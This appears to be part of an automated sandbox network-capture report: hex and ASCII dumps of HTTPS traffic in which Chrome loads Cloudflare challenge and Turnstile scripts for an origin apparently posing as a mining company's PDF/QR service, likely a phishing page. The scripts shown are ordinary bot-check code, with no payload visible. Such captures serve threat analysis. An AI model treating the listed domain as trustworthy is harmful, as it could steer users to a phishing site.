                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 74 68 65 25 32 30 70 61 67 65 2e 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 5f 61 75 78 22 3a 22 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 52 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 74 6f 25 32 30 74 72 79 25 32 30 61 67 61 69 6e 2e 25 32 30 49 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 25 32 30 61 74 74 65 6d 70 74 25 32 30 61 25 32 30 64 69 66 66 65 72 65 6e 74 25 32 30 6c 69 6e 6b 25 32 30 74 6f 25 32 30 67 65 74 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 64 65 73 69 72 65 64 25 32 30 70 61 67 65 2e 25 32 30 41 6c 74 65 72 6e 61 74 69 76 65 6c 79 25 32 43 25
                                                                                                                                                Data Ascii: the%20page.","time_check_cached_warning_aux":"%3Ca%20class%3D%22refresh_link%22%3ERefresh%20the%20page%3C%2Fa%3E%20to%20try%20again.%20If%20the%20issue%20persists%20attempt%20a%20different%20link%20to%20get%20to%20the%20desired%20page.%20Alternatively%2C%
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 32 46 61 25 33 45 25 32 30 61 6e 64 25 32 30 75 6e 61 62 6c 65 25 32 30 74 6f 25 32 30 63 6f 6d 70 6c 65 74 65 25 32 30 76 65 72 69 66 69 63 61 74 69 6f 6e 2e 25 32 30 54 72 79 25 32 30 61 25 32 30 64 69 66 66 65 72 65 6e 74 25 32 30 62 72 6f 77 73 65 72 25 32 30 6f 72 25 32 30 6d 61 6b 65 25 32 30 73 75 72 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 75 70 64 61 74 65 64 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 6e 65 77 65 73 74 25 32 30 76 65 72 73 69 6f 6e 2e 22 2c 22 6c 6f 63 61 74 69 6f 6e 5f 6d 69 73 6d 61 74 63 68 5f 77 61 72 6e 69 6e 67 22 3a 22 57 65 62 73 69 74 65 25 32 30 69 73 25 32 30 6e 6f 74 25 32 30 61 63 63 65 73 73 69 62 6c 65 25 32 30 76 69 61 25 32 30 74 68 69 73 25 32 30 61 64 64 72 65 73 73 2e 22 2c
                                                                                                                                                Data Ascii: 2Fa%3E%20and%20unable%20to%20complete%20verification.%20Try%20a%20different%20browser%20or%20make%20sure%20your%20browser%20is%20updated%20to%20the%20newest%20version.","location_mismatch_warning":"Website%20is%20not%20accessible%20via%20this%20address.",
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 7d 2c 22 70 6f 6c 79 66 69 6c 6c 73 22 3a 7b 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 66 61 6c 73 65 7d 2c 22 72 74 6c 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 75 73 22 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 67 46 2c 65 4d 2c 65 4e 2c 65
                                                                                                                                                Data Ascii: ly%20submitted"},"polyfills":{"turnstile_timeout":false,"turnstile_feedback_description":false,"turnstile_overrun_description":false,"feedback_report_output_subtitle":false,"testing_only_always_pass":false},"rtl":false,"lang":"en-us"};~function(gF,eM,eN,e
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 28 67 4a 28 31 31 34 34 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 67 4c 2c 48 29 7b 66 6f 72 28 67 4c 3d 67 4a 2c 47 5b 67 4c 28 31 30 35 32 29 5d 28 29 2c 48 3d 30 3b 6f 5b 67 4c 28 31 30 35 34 29 5d 28 48 2c 47 5b 67 4c 28 37 34 30 29 5d 29 3b 6f 5b 67 4c 28 35 35 34 29 5d 28 47 5b 48 5d 2c 47 5b 48 2b 31 5d 29 3f 47 5b 67 4c 28 31 33 34 31 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 67 4a 28 35 39 30 29 5d 5b 67 4a 28 31 31 39 31 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 67 4a 28 37 34 30 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 6f 5b 67 4a 28 35 32 37 29 5d 28 65 52 2c 67 2c 68 2c 44 29 2c 6f 5b 67 4a 28 36 31 38 29 5d
                                                                                                                                                Data Ascii: (gJ(1144))](x)):function(G,gL,H){for(gL=gJ,G[gL(1052)](),H=0;o[gL(1054)](H,G[gL(740)]);o[gL(554)](G[H],G[H+1])?G[gL(1341)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[gJ(590)][gJ(1191)](B),C=0;C<x[gJ(740)];D=x[C],E=o[gJ(527)](eR,g,h,D),o[gJ(618)]
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 2c 7b 27 62 50 76 74 78 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 65 59 28 63 29 7d 63 61 74 63 68 28 67 29 7b 72 65 74 75 72 6e 20 65 5b 67 5a 28 35 31 33 29 5d 28 65 57 2c 65 58 28 63 29 29 7d 7d 2c 65 5a 3d 66 75 6e 63 74 69 6f 6e 28 68 30 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 68 30 3d 67 46 2c 64 3d 7b 27 67 68 48 45 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 44 46 6a 50 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 2c 6a 29 7b 72 65 74 75 72 6e 20 68 28 69 2c 6a 29 7d 2c 27 55 73 55 49 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 5e 68 7d 2c 27 54 62 68 64 77 27 3a 66 75 6e 63
                                                                                                                                                Data Ascii: ,{'bPvtx':function(g,h){return g(h)}});try{return eY(c)}catch(g){return e[gZ(513)](eW,eX(c))}},eZ=function(h0,d,e,f,g){return h0=gF,d={'ghHEs':function(h,i){return i==h},'DFjPz':function(h,i,j){return h(i,j)},'UsUIT':function(h,i){return i^h},'Tbhdw':func
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 70 47 78 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 41 4a 72 43 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6b 69 78 52 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 4a 4f 73 52 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 56 49 47 76 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 72 49 4f 6d 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 3d 68 7d 2c 27 74 79 79 5a 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 68 30 28 37
                                                                                                                                                Data Ascii: pGxZ':function(h,i){return i==h},'AJrCu':function(h,i){return h(i)},'kixRl':function(h,i){return h&i},'JOsRl':function(h,i){return i==h},'VIGvM':function(h,i){return h<i},'rIOmU':function(h,i){return i===h},'tyyZU':function(h,i){return h+i}},e=String[h0(7
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 68 36 28 34 37 37 29 5d 28 30 29 2c 78 3d 30 3b 38 3e 78 3b 49 3d 4e 26 31 7c 49 3c 3c 31 2e 36 2c 64 5b 68 36 28 31 34 34 35 29 5d 28 4a 2c 64 5b 68 36 28 31 33 38 30 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 68 36 28 31 33 30 37 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 20 69 66 28 64 5b 68 36 28 35 31 30 29 5d 28 68 36 28 31 34 34 32 29 2c 68 36 28 36 38 30 29 29 29 4e 28 29 5b 68 36 28 36 32 32 29 5d 3d 27 27 3b 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 4e 7c 49 3c 3c 31 2c 64 5b 68 36 28 35 35 31 29 5d 28 4a 2c 64 5b 68 36 28 31 31 36 36 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b
                                                                                                                                                Data Ascii: )),I=0):J++,x++);for(N=D[h6(477)](0),x=0;8>x;I=N&1|I<<1.6,d[h6(1445)](J,d[h6(1380)](j,1))?(J=0,H[h6(1307)](o(I)),I=0):J++,N>>=1,x++);}else if(d[h6(510)](h6(1442),h6(680)))N()[h6(622)]='';else{for(N=1,x=0;x<G;I=N|I<<1,d[h6(551)](J,d[h6(1166)](j,1))?(J=0,H[
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 68 36 28 36 39 32 29 5d 28 36 39 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 68 36 28 34 37 37 29 5d 28 74 68 69 73 2e 68 5b 36 39 2e 34 36 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 26 32 35 35 5e 39 31 2e 33 35 2c 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 53 5d 3d 52 5b 68 36 28 31 33 36 30 29 5d 28 29 7d 65 6c 73 65 20 69 66 28 64 5b 68 36 28 31 33 33 38 29 5d 28 68 36 28 31 33 30 39 29 2c 68 36 28 39 36 36 29 29 29 53 3d 74 68 69 73 2e 68 5b 73 5b 68 36 28 31 30 34 33 29 5d 28 36 39 2c 74 68 69 73 2e 67 29 5d 2c 54 3d 74 68 69 73 2e 68 5b 36 39 5e 74 68 69 73 2e 67 5d 5b 33 5d 5e 73 5b 68 36 28 35 32 30 29 5d 28 73 5b 68 36 28 31 34 31 39 29 5d 28 74 68 69 73 2e 68 5b 36 39 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 68 36 28 34 37 37 29 5d 28 74 68 69 73 2e 68 5b
                                                                                                                                                Data Ascii: h6(692)](69,this.g)][1][h6(477)](this.h[69.46^this.g][0]++)&255^91.35,this.h[this.g^S]=R[h6(1360)]()}else if(d[h6(1338)](h6(1309),h6(966)))S=this.h[s[h6(1043)](69,this.g)],T=this.h[69^this.g][3]^s[h6(520)](s[h6(1419)](this.h[69^this.g][1][h6(477)](this.h[


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                8192.168.2.1649725104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:36 UTC603OUTGET /turnstile/v0/b/e1a56f38220d/api.js?onload=tDpp4&render=explicit HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                Origin: https://vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:36 UTC471INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:36 GMT
                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                Content-Length: 47672
                                                                                                                                                Connection: close
                                                                                                                                                accept-ranges: bytes
                                                                                                                                                last-modified: Wed, 23 Oct 2024 21:21:17 GMT
                                                                                                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c689bfa126b51-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:36 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                                                Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                                                                                Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28
                                                                                                                                                Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64
                                                                                                                                                Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79
                                                                                                                                                Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74
                                                                                                                                                Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
                                                                                                                                                2024-10-28 16:47:36 UTC1369INData Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30
                                                                                                                                                Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
